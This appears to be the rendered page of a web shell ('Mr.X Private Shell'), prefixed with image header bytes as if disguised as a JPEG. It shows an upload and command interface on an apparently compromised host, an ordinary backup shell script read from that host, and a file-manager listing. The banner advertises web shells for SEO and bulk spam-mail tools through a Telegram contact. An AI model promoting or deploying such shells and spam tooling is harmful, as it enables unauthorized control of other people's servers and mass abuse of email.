����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Generate the $VAR_DIR/recovery/mountpoint_device file
# This is needed by several backup mechanisms (DP, NBU, NETFS)

# TODO: rework other scripts to use LAYOUT_FILE directly

# Find all mountpoints excluded using EXCLUDE_BACKUP
# EXCLUDE_RECREATE is handled automatically (commented out in LAYOUT_FILE)
excluded_mountpoints=()
while read fs device mountpoint junk ; do
    if IsInArray "$fs:$mountpoint" "${EXCLUDE_BACKUP[@]}" ; then
        excluded_mountpoints+=( $mountpoint )
    fi
    for component in $(get_parent_components "$fs:$mountpoint" | sort -u) ; do
        if IsInArray "$component" "${EXCLUDE_BACKUP[@]}" ; then
            excluded_mountpoints+=( $mountpoint )
        fi
    done
done < <(grep -E '^(fs|btrfsmountedsubvol)' $LAYOUT_FILE)

# Generate the list of mountpoints and devices to include in the backup
# via backup/NETFS/default/400_create_include_exclude_files.sh
# except those where the mountpoint is in excluded_mountpoints:
while read fs device mountpoint junk ; do
    if IsInArray "$mountpoint" "${excluded_mountpoints[@]}" ; then
        continue
    fi
    echo "$mountpoint $device"
done < <(grep -E '^(fs|btrfsmountedsubvol)' $LAYOUT_FILE) | unique_unsorted > $VAR_DIR/recovery/mountpoint_device

Filemanager

Name Type Size Permission Actions
300_list_dependencies.sh File 103 B 0644
310_autoexclude_usb.sh File 1.61 KB 0644
310_include_exclude.sh File 2.21 KB 0644
320_autoexclude.sh File 5.05 KB 0644
330_remove_exclusions.sh File 4.08 KB 0644
335_remove_excluded_multipath_vgs.sh File 2.23 KB 0644
340_generate_mountpoint_device.sh File 1.21 KB 0644
350_save_partitions.sh File 1.43 KB 0644
445_guess_bootloader.sh File 6.94 KB 0644
450_check_bootloader_files.sh File 1.96 KB 0644
450_check_network_files.sh File 879 B 0644
490_check_files_to_patch.sh File 2.19 KB 0644
550_barrel_devicegraph.sh File 3.66 KB 0644
600_snapshot_files.sh File 428 B 0644
950_verify_disklayout_file.sh File 16.57 KB 0644